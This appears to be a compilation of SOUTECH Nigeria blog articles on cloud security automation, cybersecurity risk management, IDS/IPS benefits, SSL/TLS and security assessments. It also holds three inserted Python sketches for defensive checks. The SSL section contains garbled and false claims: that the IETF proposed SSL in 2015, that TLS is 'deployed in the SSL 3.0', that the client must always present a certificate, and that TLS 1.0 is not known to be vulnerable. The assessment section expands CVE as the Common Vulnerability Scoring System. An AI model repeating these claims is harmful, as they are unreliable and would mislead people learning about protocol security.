There has been rapid growth in the use of cloud storage, and cloud technology is gradually moving from a ‘cloud-first’ strategy to a ‘cloud-only’ strategy. This is because cloud computing is expected, in the year 2020, to take up to about 70% of enterprise software as well as infrastructure.
The growth of public cloud technology has exposed organizations to trending security threats that normally cannot be minimized by employing endpoint security methodologies and technologies.
Security will be compromised without a modern, cloud-native approach. The factors that affect security include:
The architecture of the cloud is entirely different from that of legacy data centers, which requires new approaches to security. Traditional tools like penetration testing tools and network scanners are not so reliable because the cloud is API-centric.
2. Increase of DevOps
When it comes to using public cloud, DevOps teams are often on their own, which ends up with central IT security teams not being involved, informed or made aware. IT security teams require a new method of monitoring events because so many organizations are pushing code changes to production every day.
3. A more sophisticated threat landscape
Hackers have kept pace by deploying similar tactics to automate attacks while DevOps teams have moved towards automating their code deployment process. This means that the attack surface has changed and there is no longer a single path of traffic that can be monitored. To gain more visibility, security teams have resorted to deploying new tools across all aspects of the organization’s cloud applications.
The four-step program for bolstering cloud security
The issues surrounding cloud security can be solved by the use of modern, cloud-native platforms, which make automation easy in order to provide continuous monitoring, analysis and remediation for cloud security compliance. This model offers much better protection in the cloud than traditional security platforms. Top cloud security experts have revealed that, in order to achieve continuous and automated cloud security and compliance, four key elements have to be addressed:
- Real-time discovery in order to match the increasing pace of cloud changes: It is not unusual for firms and organizations to possess millions of data points which require evaluation, given the increasing complexity surrounding deployments in the cloud. A platform that can handle all the data in real time and rapidly isolate any security deviations and variations from known-good states is needed to keep cloud functionality active.
- Automated action: Organizations must automate monitoring and remediation to keep up. They also need to be flexible in determining how automated responses are made, and they must be able to inform human administrators if any other action is needed.
- Deep insights to identify risks that may not be obvious: Communication can falter when the number of teams is large. Your platform should make provision for teams to take ownership of their own security while also setting up security operations for other teams and corporate management in the bigger picture. This platform must be able to evaluate security information alongside the global customer base, or across time and geography, to warn against potential issues before they occur.
- Robust reporting: Teams must put together comprehensive and properly detailed reports about their daily security compliance, and this should not only be done during the yearly audit. You should be able to view the past and present state of your security and compliance stance at a glance.
In conclusion, as organizations and firms rely on public cloud to drive their daily business schemes and activities, they should also focus on the security risks and simplify the processes involved in assuring protection and compliance. Continuous security and compliance present us with new opportunities to maximize the value of the public cloud while minimizing the risk.
While evaluating potential cloud security platforms, it is very important to focus on key characteristics such as automation, deep insights, robust reporting and real-time discovery. There is a popular saying in the IT world that the deployment of cloud technology changes everything, but what doesn’t change is the importance of ensuring security and compliance.
To learn more about the security of the cloud environment as well as other security methodologies such as, vulnerability assessments, risk assessments and penetration testing, subscribe to our services at soutech ventures to learn CEH course in details.
Cybersecurity breaches are inevitable; What to do to stay safe - Information Security tips - SOUTECH Nigeria
Esang U. E
Cybersecurity threats have become a cause of concern for many organizations, especially with the daily reports of cyber intrusions where the theft of large volumes of data and intellectual property is involved. With the rise of new exploitation techniques and methods such as insider threats, ransomware and advanced persistent threats, the need for investing in cybersecurity cannot be overemphasized.
It has also proven difficult to find rapid solutions to cyberattacks because of the dynamism of cloud computing, the operating environment, mobile support, the IoT (Internet of Things), remote users, the need to support the network devices that users bring to their offices and, of course, the question of how, where and what specific security strategies to deploy.
James Comey, a former director of the FBI, described two kinds of big companies in the United States. He categorized them into “those who have been hacked by the Chinese and those who have not been hacked by the Chinese.” Also, in January 2015 at the World Economic Forum, which was about a year later, John Chambers, a former CEO of Cisco, confirmed that the people that have been hacked do not even know they have been hacked.
From all of this information, does it mean that cybersecurity breaches are inevitable? If a cybersecurity breach is inevitable then is prevention really possible and is trying to secure data and data systems worth the money?
Despite the fact that these remarks are quite discouraging, organizations still go ahead with storing data, financial data, intellectual property and their personal data on networked systems. In the midst of all these risks, there are the good sides to data storage and security which outweigh the bad sides.
Cybersecurity involves managing risks
There are things that should be put in place to secure information even though cybersecurity breaches cannot be avoided. In environments where risk is managed, there are ways and processes that can be put in place to ensure that data breaches are avoided, which I have described in my previous article as penetration testing, vulnerability assessments and IT audits. The premise of risk management is that the risk scenario cannot be completely eliminated.
If these uncertainties can be erased, then the risk can be totally erased as well. There are two basic security measures that can be put in place if the risk of a cybersecurity breach is not zero. The first strategy is to cut down the probability of a cybersecurity breach occurring, and the second is to cut down the impact of the damage that occurs when a cybersecurity risk is discovered. These two strategies are appropriate for managing any type of cybersecurity risk. Do not forget that the general approach to cybersecurity is very transparent and easy to understand.
The first thing to identify in the operation of a business is its assets: information assets, which include raw data, people, processes and technology, have to be protected.
The second thing you must note is that the purpose of a risk assessment is to reveal risk scenarios which could lead to damage or loss of data through unauthorized and unexpected disclosures, modifications and loss of confidentiality of data assets. The components of risk are very few. The typical scenario of a cybersecurity intrusion is when a threat leverages a vulnerability to damage the security of an information asset. In this example, the components of risk exist when there is a vulnerability, an exploit takes advantage of that vulnerability, and a threat actor uses that exploit to damage the information asset’s security. Therefore, the only thing that can be controlled by the network security manager is the presence of vulnerabilities on the network. The next step is attempting to identify the risk and eliminate it.
Typically, once a risk has been identified, it can be eliminated, and when a vulnerability is eliminated, all the threat scenarios in which that vulnerability is exploited are reduced to zero.
Cybersecurity Risk Prioritization
Risk management at its core is a decision-support tool and once all the necessary cybersecurity scenarios have been unraveled, the job of the decision-support tool is to prioritize the order and manner in which the identified risks can be mitigated or controlled.
If there are insufficient resources to handle all the identified vulnerabilities, then prioritizing risks for remediation and mitigation becomes important. Prioritization is also very valuable even when there are sufficient resources to remediate the existing vulnerabilities.
Outcome vs Impact
The prioritization of vulnerabilities is based on their potential impact on the organization if the risk scenarios exploiting a vulnerability are all realized. If potential impact is the prioritization factor, it is important to understand what impact is. Whenever a vulnerability is exploited, there is an unwanted outcome, which involves an unwanted disclosure of data, unauthorized modification or the loss of access to the information asset affected by the vulnerability being exploited. The result of an unwanted outcome is referred to as impact.
Under the HIPAA privacy or security rules, for example, if health records are stolen, the outcome is that information will be disclosed, but the impact on the organization is the cost of mandatory breach notification and the potential for fines and civil penalties, which could run into millions of naira and dollars.
The prioritization of vulnerability mitigation by potential impact can be done in different ways, and one of them is the use of a prioritization tool called the Common Vulnerability Scoring System (CVSS), which provides a framework for understanding the characteristics and impacts of vulnerabilities in information technology.
When CVSS is used, an organization that finds a risk has been rated low or medium severity is likely to choose not to remediate it. But organizations with many systems, including mission-critical systems, need to understand that the potential impact on the asset and the organization does not depend solely on the CVSS rating; it could be higher, and the organization needs to remediate the vulnerability.
In conclusion, if it is true that cybersecurity breaches cannot be avoided then all is not lost. The only sad thing is it will not be possible to completely eliminate the uncertainty that there will be data breaches.
The need for an Automated Approach to Cloud Security and Compliance - Challenges in Cloud Computing - Soutech Nigeria
Esang U. E
Regardless of whether you are in charge of general IT, IT security, DevOps or administrative compliance, odds are that public cloud services are a steadily growing part of your portfolio. This can be great for the business, enabling lower costs, greater agility and faster speed to market. However, it can present new and serious difficulties in ensuring security and compliance.
The public cloud is a radically new world. If you think traditional techniques for securing the data center or firewalling the perimeter will keep your information and applications secure, you might be in for a reality check. The main issue with legacy approaches is that they were not designed for the cloud era, which means they don’t support or make use of the API-driven infrastructure of the public cloud.
Whatever your role is in your organization, you can derive huge advantages by embracing a modern, cloud-native model that uses purpose-built tools to continuously and automatically monitor and manage security and compliance along the API control plane.
If you are in charge of IT, security or compliance, you can reduce costs, improve security and assert greater control over cloud technology and shadow IT. If you are in DevOps, you can move quickly without waiting for approvals from security, while eliminating the potential for the disaster that is always looming if appropriate security and compliance checks and balances are not in place.
Given the proper cloud security platform, the whole organization can make use of automation to reduce risk and remove the human element from critical processes. Automation enables you to achieve continuous visibility over your cloud deployments, enabling consistent replication across environments such as development, staging and production.
Automation, Security, Compliance and the cloud
The adoption of cloud technology moves too rapidly, and is subject to changes that are too quick, for organizations and firms to depend on manual resources. The major challenge, however, is that most organizations still use legacy tools, technologies and methodologies to manage cloud security and compliance.
Luckily, new cloud-native solutions are now available, delivering an agentless platform designed specifically for modern clouds.
These solutions use the cloud’s API architecture to deliver great flexibility in scaling and managing cloud security and compliance.
The steps below depict how a modern automated approach to continuous cloud security and compliance works. It is based on the Evident Security Platform from leading cloud security firm Evident.
Close Observation: The cloud computing environment is changing constantly. These changes can be normal, routine activities of your DevOps or IT teams; they can also be the work of people who would do harm to your business. As changes are made across all cloud platforms, services and regions, the cloud security platform monitors the configurations of the cloud infrastructure to ensure that it adheres to security and compliance best practices.
Assessment: The security platform securely gathers information about the services in your cloud and continuously performs checks against a series of predefined security best practices. It also performs checks against any predefined custom signatures. These checks determine, on a continuous basis, whether there are any potentially exploitable vulnerabilities.
In-depth Analysis: The platform then performs an analysis in which the misconfigurations and exposures are prioritized and quantified into high, medium or low risk levels.
Automated Remediation: The results of the analysis are shown on a dashboard and can be sent to integrated systems so that auto-remediation workflows can start.
Robust Reporting: Comprehensive and detailed reports are made available so your teams can see information about the risk, as well as user attribution and affected assets.
Correction: The teams can then use easy-to-follow remediation steps to return the infrastructure to a safe state.
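The cycle described in the steps above can be sketched in a few functions. This is an added example, not code from the Evident Security Platform or from the original article; the inventory snapshots, resource names, check identifiers and risk levels are all constructed, standing in for configuration data an agentless platform would read through the provider's API.

```python
from collections import Counter

RISK_ORDER = {"high": 0, "medium": 1, "low": 2}

# Constructed snapshots of a cloud inventory at two points in time.
PREVIOUS = {
    "bucket/invoices": {"type": "bucket", "public_read": False, "encrypted": True, "changed_by": "alice"},
    "fw/web": {"type": "firewall_rule", "port": 443, "source": "0.0.0.0/0", "changed_by": "bob"},
    "user/ci-bot": {"type": "iam_user", "console_access": False, "mfa": False, "changed_by": "alice"},
}
CURRENT = {
    **PREVIOUS,
    "bucket/invoices": {"type": "bucket", "public_read": True, "encrypted": True, "changed_by": "carol"},
    "bucket/logs": {"type": "bucket", "public_read": False, "encrypted": False, "changed_by": "bob"},
    "fw/admin": {"type": "firewall_rule", "port": 22, "source": "0.0.0.0/0", "changed_by": "carol"},
    "user/dave": {"type": "iam_user", "console_access": True, "mfa": False, "changed_by": "bob"},
}

# (check id, risk, resource type, predicate true when violated, safe to auto-fix, remediation)
CHECKS = [
    ("BUCKET_PUBLIC", "high", "bucket", lambda r: r["public_read"], True,
     "Remove public read access"),
    ("ADMIN_PORT_OPEN", "high", "firewall_rule",
     lambda r: r["source"] == "0.0.0.0/0" and r["port"] in (22, 3389), False,
     "Restrict the source range to the admin network"),
    ("CONSOLE_NO_MFA", "medium", "iam_user",
     lambda r: r["console_access"] and not r["mfa"], False,
     "Require MFA for console users"),
    ("BUCKET_UNENCRYPTED", "low", "bucket", lambda r: not r["encrypted"], True,
     "Enable default encryption"),
]


def changed_resources(previous, current):
    """Close observation: resources that are new or whose configuration changed."""
    return sorted(rid for rid, cfg in current.items() if previous.get(rid) != cfg)


def assess(inventory, resource_ids):
    """Assessment and analysis: run every check, return findings ordered by risk."""
    findings = []
    for rid in resource_ids:
        cfg = inventory[rid]
        for check_id, risk, rtype, violated, auto, fix in CHECKS:
            if cfg["type"] == rtype and violated(cfg):
                findings.append({"resource": rid, "check": check_id, "risk": risk,
                                 "changed_by": cfg["changed_by"], "auto": auto, "fix": fix})
    return sorted(findings, key=lambda f: (RISK_ORDER[f["risk"]], f["resource"]))


def triage(findings):
    """Automated remediation: split findings into auto-fix and notify-a-human queues."""
    auto = [f for f in findings if f["auto"]]
    notify = [f for f in findings if not f["auto"]]
    return auto, notify


def summary(findings):
    """Reporting: number of open findings per risk level."""
    return dict(Counter(f["risk"] for f in findings))


def run_cycle(previous, current):
    changed = changed_resources(previous, current)
    findings = assess(current, changed)
    auto, notify = triage(findings)
    return {"changed": changed, "findings": findings, "auto": auto,
            "notify": notify, "summary": summary(findings)}


if __name__ == "__main__":
    result = run_cycle(PREVIOUS, CURRENT)
    for f in result["findings"]:
        print(f["risk"], f["resource"], f["check"], "by", f["changed_by"], "->", f["fix"])
    print(result["summary"])
```

Each finding carries the user who made the change, so the report gives the attribution the reporting step calls for.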
Public cloud is not going to be phased out any time soon; before the decade is over, the public cloud services market will surpass $230 billion, as predicted by Forrester Research. As cloud becomes more central to the success of your organization, it is key that you focus on security and compliance, regardless of whether your role is in IT, security, DevOps or corporate administration and compliance.
By embracing a continuous security model, your organization will be able to handle many processes that would overwhelm your teams and systems if they had to be done manually. It not only provides enhanced security and compliance assurance, it also relieves the burden on your staff, improves security for DevOps and other teams, and lowers the cost and risk of cloud security and compliance.
Cloud computing and its associated technologies make up a very broad field, but in a few of my write-ups I have been able to discuss some of the trends and challenges being faced in the cloud environment.
Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) have been very effective over the years in countering cyberattacks and in securing the network perimeter and the segments of the internal network. They serve as extra eyes in securing data from loss, unauthorized access and any form of damage that can lead to collateral damage to the organization in both monetary terms and reputation.
Now, the usage and effectiveness of these devices and technologies can only be sustained when there is sufficient manpower and training. Organizations and network administrators must understand that the use of IDSs and IPSs requires training in order to interpret and act on their results.
There are benefits in deploying IDS/IPS technology in businesses, which include:
- Identifying the number and the type of security incidents.
- Making sure security events do not escalate to security incidents.
- Improving the ability to discover network devices.
- Protection of vulnerable assets.
- Protection of operating systems and application software.
- Using all the information obtained to meet various regulatory requirements.
Now let us go ahead and explore the benefits of IDS/IPS in information security.
1. Identifying security incidents
IDS/IPS technologies do not only capture logs of the IP addresses and ports of the communication going on between different systems; they can also be used to identify specific content inside a network packet. For example, they can capture the reports that compromised endpoint devices send to botnet controllers and can also identify DDoS attacks.
The sensors in a modern IDS/IPS can help to quantify the types and numbers of attacks that an organization is vulnerable to, and can go further to help it alter existing security controls and deploy new ones. They can also identify bugs in software and address host and network device configuration issues. The results can be used to perform further risk assessments.
2. Prevention of security incidents
The deployment of IDS/IPS technology can help to prevent security incidents, which it does by disrupting communication between an attacker and the target; it can report security incidents as well. Sensors in a modern IDS/IPS can take packets from the network and examine them in the context of the protocols carrying them. For example, an HTTP protocol attack such as cross-site scripting or SQL injection can be detected and blocked. The sensors can also identify and block anomalous behavior, which can be in the form of outbound traffic.
3. Protection of vulnerable assets
IDS/IPS have been upgraded to act as virtual patches for some software vulnerabilities. This enables network administrators to block attacks until patches have been developed for such software vulnerabilities, and to avoid the cost of replacing systems while waiting for the patches to be ready. The ability to identify patch levels can be very useful for gauging the deployment of patches and for automating vulnerability assessments.
4. Identification of network devices and hosts
Sensors in IDS/IPS can be used passively to detect the presence of network devices and hosts as well. They can do this by:
- Examining the data within the network packets in real time.
- Identifying the operating systems and services offered by the network device or host.
This can eliminate a great deal of the manual work involved in determining the number of systems that are available alongside their configurations. Apart from helping to automate hardware inventories, IDS/IPS can be used to identify rogue devices in the network, such as unauthorized hosts, rogue wireless access points and rogue hotspots.
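The passive inventory and rogue-device check described above can be sketched as follows. This is an added example, not output or code from any particular IDS/IPS product; the observation records, MAC addresses, host names and SSIDs are constructed, and the record format is an assumption about what a passive sensor might export.

```python
from collections import defaultdict

# Constructed authorised inventory (MAC -> asset name) and approved access points.
AUTHORIZED_HOSTS = {
    "02:00:00:00:00:10": "web01",
    "02:00:00:00:00:11": "mail01",
    "02:00:00:00:00:12": "laptop-ops",
}
AUTHORIZED_APS = {"02:00:00:00:aa:01"}
CORPORATE_SSIDS = {"corp-wifi"}

# Constructed passive observations: service banners, OS fingerprints, Wi-Fi beacons.
OBSERVATIONS = [
    {"kind": "service", "mac": "02:00:00:00:00:10", "ip": "10.0.0.10", "port": 443, "banner": "nginx"},
    {"kind": "service", "mac": "02:00:00:00:00:11", "ip": "10.0.0.11", "port": 25, "banner": "Postfix"},
    {"kind": "os_hint", "mac": "02:00:00:00:00:12", "ip": "10.0.0.12", "os": "Windows"},
    {"kind": "service", "mac": "02:00:00:00:00:99", "ip": "10.0.0.99", "port": 22, "banner": "OpenSSH"},
    {"kind": "os_hint", "mac": "02:00:00:00:00:99", "ip": "10.0.0.99", "os": "Linux"},
    {"kind": "beacon", "bssid": "02:00:00:00:aa:01", "ssid": "corp-wifi"},
    {"kind": "beacon", "bssid": "02:00:00:00:bb:07", "ssid": "corp-wifi"},
    {"kind": "beacon", "bssid": "02:00:00:00:cc:09", "ssid": "CoffeeShop"},
]


def build_inventory(observations):
    """Fold per-packet observations into one record per host (keyed by MAC)."""
    hosts = defaultdict(lambda: {"ips": set(), "os": None, "services": set()})
    for obs in observations:
        if obs["kind"] == "beacon":
            continue  # access points are handled separately
        host = hosts[obs["mac"]]
        host["ips"].add(obs["ip"])
        if obs["kind"] == "os_hint":
            host["os"] = obs["os"]
        elif obs["kind"] == "service":
            host["services"].add((obs["port"], obs["banner"]))
    return {mac: {"ips": sorted(h["ips"]), "os": h["os"], "services": sorted(h["services"])}
            for mac, h in hosts.items()}


def find_rogues(inventory, observations):
    """Compare what the sensor saw against what is authorised."""
    unauthorized = sorted(mac for mac in inventory if mac not in AUTHORIZED_HOSTS)
    rogue_aps, unknown_hotspots = set(), set()
    for obs in observations:
        if obs["kind"] != "beacon" or obs["bssid"] in AUTHORIZED_APS:
            continue
        # An unapproved radio advertising a corporate SSID is the more serious case.
        if obs["ssid"] in CORPORATE_SSIDS:
            rogue_aps.add(obs["bssid"])
        else:
            unknown_hotspots.add(obs["bssid"])
    return {"unauthorized_hosts": unauthorized,
            "rogue_aps": sorted(rogue_aps),
            "unknown_hotspots": sorted(unknown_hotspots)}


if __name__ == "__main__":
    inv = build_inventory(OBSERVATIONS)
    for mac, rec in sorted(inv.items()):
        print(mac, AUTHORIZED_HOSTS.get(mac, "UNKNOWN"), rec)
    print(find_rogues(inv, OBSERVATIONS))
```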
5. Leveraging of information gained to meet regulatory requirements
IDS/IPS can give an organization deep insight into its networks and their connected resources. Regulatory mandates can also be met: for example, PCI-DSS 1.1.6 calls for the documentation and business justification of the use of all services and protocols, and this can be researched using reports obtained from IDS/IPS logs.
6. Improvement in the Return on Investment (ROI)
Some improved efficiencies, and the attendant labour costs, have been identified. An organization can determine how much of a return on investment (ROI) an IDS/IPS can supply if the infrastructure is able to reduce or completely mitigate two major things:
- Degradation and denial of internet service and/or internal network service such as application service downtimes and business ramifications of the network.
- A security breach which involves the loss of sensitive customer information and credentials as well as intellectual property.
My word for network administrators is to explore the use of IDS/IPS further to boost business and to ensure that, aside from the basic functions, they are able to harness the other functionalities in these devices.
One of the major issues that Chief Information Officers (CIOs) and Chief Information Security Officers (CISOs) face is gaining visibility into their cloud security posture. How can they be expected to put the proper and necessary controls and security measures in place if they cannot even identify where the security flaws exist?
Without a new approach, the problems promise to get a whole lot worse before they get better. Why? Let us count the ways:
1. Growth of public cloud: Organizations have now deployed cloud services to a much greater degree than ever before. According to a study, the use of cloud services in the average enterprise now amounts to about 1,427 services.
2. Shadow IT: A lot of the publicly available cloud services and applications result from shadow IT initiatives and are usually out of the control of the security teams and line-of-business managers who seem not to be familiar with security and compliance best practices.
3. DevOps: As I mentioned in my follow-up article on DevOps, DevOps teams have continued to outpace security teams, going out on their own to deploy public cloud services to increase the rate of their development. These teams often do not want to be dragged behind by security and compliance concerns.
4. Tools and technologies that have become extinct: Traditional tools used for the monitoring and remediation of endpoints have not been effective in data center environments and cannot be effective and efficient for securing public clouds.
5. The pace of change: Cloud environments change too quickly for manual processes to keep pace, even assuming that organizations are able to hire and retain personnel who are trained and experienced in cloud security and compliance management. CISOs and CIOs really need to worry about complacency in the use of cloud storage, because public cloud providers like Amazon Web Services and MS Azure have stepped up their game in the past couple of years and, because of this, surveys have shown that IT heads are becoming less worried about the security challenges in the cloud environment. It has also been discovered that the biggest risks are always more in the internal network than in the external network.
6. The relationship between automation, visibility and continuous security and compliance: The question, therefore, is how CIOs and CISOs gain the visibility they need in order to minimize risk and maximize protection. The simple answer is automation: by automating the processes of monitoring, analysis and remediation across the whole cloud environment, security teams can gain the visibility they need to address their biggest cloud security and compliance challenges. The architecture of the cloud makes it a perfect fit for an automated approach to security and compliance, because the cloud environment uses the API model, which cloud-native agentless solutions build on. This architecture can be used to give IT security and DevOps teams tremendous visibility and flexibility. With an automated model, CIOs and CISOs can:
- Obtain a bigger-picture view across all their cloud environments, with a centralized means to manage and control events.
- Allow DevOps and other teams to manage the security and compliance best practices that are necessary for their own cloud deployments and controls.
- Lower costs and reduce risk levels and complexity by replacing manual tasks with automated processes.
- Improve time to value by securely making use of the public cloud to empower smaller teams, be they individual lines of business or DevOps.
- Flag risks and remediate threats before they get a chance to affect availability, compliance and operations.
Finally, public cloud services have created a plethora of openings for security officers, helping them deliver significant value to their establishments in lower costs, accelerated development cycles and greater productivity. However, there are a lot of risks masked behind these opportunities, and these risks revolve around security and compliance. The good thing is that there is a path to success: automation that provides continuous security and continuous compliance. This is the time to take the first step towards cloud security.
I’ll be teaching here on the Secure Sockets Layer (SSL), because I believe most of you have heard of SSL as a protocol but do not know how it works; don’t worry, I’ve got you.
What is SSL?
Secure Sockets Layer is a protocol used in computer networks to secure connections between network application clients and servers over insecure networks such as the internet. SSL was proposed for use on the internet by the Internet Engineering Task Force (IETF) in 2015 because of the very many protocol and implementation flaws and vulnerabilities found in the other internet protocols. It has, however, been replaced by the TLS (Transport Layer Security) protocol. TLS and SSL are not compatible with each other, and therefore TLS is deployed in the SSL 3.0.
SSL was originally developed as a proprietary protocol in the 1990s to allow Netscape browser clients, which work over HTTP (Hypertext Transfer Protocol), to communicate securely with Netscape web servers. SSL was eventually adopted to secure authentication and encryption in network transport layer communications.
Encryption Standard used in SSL
SSL makes use of two kinds of keys, the public key and the symmetric key, to ensure encryption when two machines establish a connection. These machines are typically a web or mail server and a client system communicating over the internet or some other TCP/IP network. SSL makes sure that data sent between two processes working in the client-server model is encrypted and authenticated.
SSL works above the transport and network layers, which are responsible for the transportation of data packets between processes and the routing of network traffic between a client and server. It also works below application layer protocols like the popular HTTP and SMTP (Simple Mail Transfer Protocol).
Ever wondered what the word ‘socket’ in the term SSL refers to? It refers to the sockets method by which data is transported between a client and server program over a network, or between processes that run on the same computer.
As I said, the TLS protocol was developed from SSL and has phased out the SSL protocol, but the terms SSL and SSL/TLS are still commonly used to refer to the protocol used to protect internet traffic. SSL/TLS is the most widely deployed security protocol in use today and is known to secure up to about 50% of the pages loaded in the Google Chrome browser. In addition to supporting the transmission of web pages, SSL has been implemented for applications such as email, file transfer, VoIP and instant messaging.
How does SSL work?
The SSL protocol has two major sub-protocols:
- The Record Protocol: This protocol defines how the communicating hosts exchange data via SSL, including specifications for how data is to be prepared before being transmitted. It also defines how received data is verified and decrypted.
- The Handshake Protocol: This protocol defines how the client and server establish an SSL connection. This includes negotiating which cryptographic systems each host is willing or unwilling to use, and the exchange of cryptographic material such as the session keys and public keys for the encryption or authentication of transmitted data.
Now, during the handshake, the first thing that takes place is that the server presents its digital certificate in order to authenticate itself to the client. Server certificates use the X.509 certificate standard format, which is defined by the public key cryptography standards. To authenticate the server, public key encryption is used to validate the digital certificate and confirm that the server is what it says it is.
As soon as the server is authenticated, the client and the server go ahead to establish the cipher settings, and a shared key is used to encrypt the information being exchanged until the session expires. In this way, data confidentiality and integrity are assured, and the whole process is invisible to the user.
For example, if a web page needs an SSL connection, the URL changes from HTTP to HTTPS, and you will see a padlock icon on the left pane of the browser once the server is authenticated.
The handshake process allows the authentication to happen between the client and server. When the server authentication is complete, the client has to present its certificate to the server in order to authenticate its identity before it is encrypted for the SSL session to be established.
Version 3.1 of the SSL was released as TLS 1.0 (which was named to avoid legal issues with Netscape) after IETF officially took over the SSL protocol in order to standardize it through the open process. Attacks perpetrated against the SSL have been majorly been focused on issues in the SSL implementation. POODLE (Padding Oracle On Downgraded Legacy encryption) vulnerability is a known flaw in the SSL 3.0 protocol which is as a result of the way it ignores padded bytes when running in the cipher block chain mode. This existence of this flaw gives room for an attacker to decrypt sensitive data like the authentication cookies. TLS 1.0 has not been known to be vulnerable to attacks because it shows that all the padding bytes need to have the same value and must be authenticated.
There are some other differences between the TLS and SSL which make it a more secure and efficient protocol which is in its message authentication, generation of the key material, and the supported cipher suites where TLS supports some new and recent secure algorithms. The most recent version is the TLS 1.2 and the publication of the next version is expected before the year of this year 2017 pending approval. This update may likely be called the TLS 1.3 or the TLS 2.0.
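To make the Record and Handshake protocol descriptions concrete, the following added example (Python, not code from the original article) parses the record header and ClientHello of a constructed sample and flags a client that still offers SSL 3.0, the version affected by POODLE. The sample bytes, function names and the short cipher-suite table are assumptions made for the illustration; extensions are not parsed.

```python
import struct

# Wire values of the two-byte protocol version field.
VERSIONS = {0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}

# A few registered cipher-suite IDs. The CBC suites are the ones POODLE
# targets when a connection is negotiated down to SSL 3.0.
SUITES = {
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
}

HANDSHAKE = 22     # record-layer content type
CLIENT_HELLO = 1   # handshake message type


def build_client_hello(version, suites):
    """Constructed sample input: a minimal ClientHello inside one record."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"  # version, random, empty session id
    body += struct.pack("!H", 2 * len(suites))
    body += b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                       # one compression method: null
    message = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BHH", HANDSHAKE, version, len(message)) + message


def parse_client_hello(record):
    """Parse one record; return record version, client version and offered suites."""
    try:
        ctype, record_version, length = struct.unpack_from("!BHH", record, 0)
        fragment = record[5:5 + length]
        if ctype != HANDSHAKE or len(fragment) != length or length < 4:
            raise ValueError("not a complete handshake record")
        if fragment[0] != CLIENT_HELLO:
            raise ValueError("not a ClientHello")
        hs_len = int.from_bytes(fragment[1:4], "big")
        body = fragment[4:4 + hs_len]
        if len(body) != hs_len:
            raise ValueError("handshake message longer than record")
        (client_version,) = struct.unpack_from("!H", body, 0)
        pos = 2 + 32                   # skip version and the 32-byte random
        pos += 1 + body[pos]           # skip the session id
        (suites_len,) = struct.unpack_from("!H", body, pos)
        pos += 2
        if suites_len % 2 or pos + suites_len > len(body):
            raise ValueError("bad cipher-suite list")
        suites = list(struct.unpack_from("!%dH" % (suites_len // 2), body, pos))
    except (struct.error, IndexError) as exc:
        raise ValueError("truncated ClientHello") from exc
    return {"record_version": record_version,
            "client_version": client_version,
            "suites": suites}


def audit(record):
    """Return human-readable findings for one ClientHello record."""
    hello = parse_client_hello(record)
    findings = []
    if hello["client_version"] <= 0x0300:
        cbc = [SUITES[s] for s in hello["suites"] if "_CBC_" in SUITES.get(s, "")]
        name = VERSIONS.get(hello["client_version"], hex(hello["client_version"]))
        findings.append("client offers %s; CBC suites offered: %s"
                        % (name, ", ".join(cbc) or "none recognised"))
    return findings


if __name__ == "__main__":
    for version, suites in ((0x0300, [0x002F, 0x0035]), (0x0303, [0xC02F, 0x009C])):
        print(VERSIONS[version], audit(build_client_hello(version, suites)))
```
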
Dear reader, do you know the best way to measure information security risk? My favorite answer is to dive in immediately and find the vulnerabilities that are inherent in your systems and applications. This can be likened to people going through different tests to learn the state of their health, such as blood tests and analysis, magnetic resonance imaging and the like. Some IT experts refer to this kind of exercise as an IT security audit, while others refer to it as penetration testing. I will say that when you are performing an in-depth analysis of any IT infrastructure, it is not just about comparing policies to how things actually work and trying to prove a point. This is why I prefer to call this exercise an information security assessment. Information security assessment is a broader and more meaningful standard for uncovering areas where security policies and procedures are lagging.
The ultimate goal of security testing is to find and fix any weaknesses in a system before anyone gets to exploit them, and this is the core reason why the semantics of security testing are debated. It is therefore the duty of all security professionals to ensure that proper steps are taken so that risk identification is understood. Let us put ego and politics aside and ensure that the key components of an effective information security scheme are given the attention they deserve. What are the key components of a detailed information security assessment?
1. Support: One of the important components is the support of management, because no good information security assessment scheme can succeed without it. If the leadership of an organisation is not willing to invest substantial resources in making sure that its IT infrastructure is well protected, then the battle will be much more uphill. The focus should be on getting and keeping the right team on board. The target should not be just management but also the security staff and the other members of the team.
2. Scope: This is a very vital phase of information security assessment, and I have seen many examples where applications, systems and even the entire IT network are excluded from security testing. The reasons are usually the same: insufficient time and lack of money. As much as you need to fine-tune the scope of your work, you have to make sure that all the critical systems are looked at, and as soon as possible. Over time you may need to look at your entire environment, because it only takes one seemingly benign system, network segment or security process to put everything in jeopardy. The systems to be considered include the external and internal systems, the systems hosted in the cloud by third parties, and the marketing website. It is also absolutely necessary to do authentic security testing of both the web applications and the operating systems. Ensure that the people, the processes and all the physical systems are fairly tested as well.
3. Testing: The testing phase should begin with a vulnerability scan using a vulnerability scanner, together with manual analysis, to discover the areas that are susceptible to attack in the context of the business environment. This phase usually includes activities like:
- Password cracking
- Wireless network analysis
- Email phishing
The most important thing in this phase is to look at the business environment from an attacker's viewpoint in order to see which areas can be exploited, and then demonstrate what may happen so that the issue can be analyzed and steps taken towards resolving it.
4. Reporting: Producing a 500-page PDF report from a vulnerability scanner will not make the issues easy to understand, nor will it prevent them from happening. The aim is a security assessment report that is concise and that prioritizes findings and recommendations on the way forward. The report does not have to be lengthy, but it needs to cut to the chase and give a detailed outline of the specific areas of weakness that should be given immediate and proper attention. This is done from the viewpoint and professionalism of the security professional, taking into account the business and its systems. IT security auditing and penetration testing are elements that are incorporated here as well. There are many standards for drafting good reports; I am not a big fan of following too many standards, and I advocate that you draft something that works for you. You can look at templates such as the CVE (Common Vulnerability Scoring System) and similar ratings, which give a severe rating to SNMP (Simple Network Management Protocol) being enabled with a two-default community string. If such vulnerabilities are rated as very high risk, then how should a weak firewall password, missing patches that are remotely exploitable, or SQL injection on intrinsic web applications be rated? What should apply here is common sense. The worst kind of information security assessment is one that is performed without a formal report and with issues that cannot be resolved.
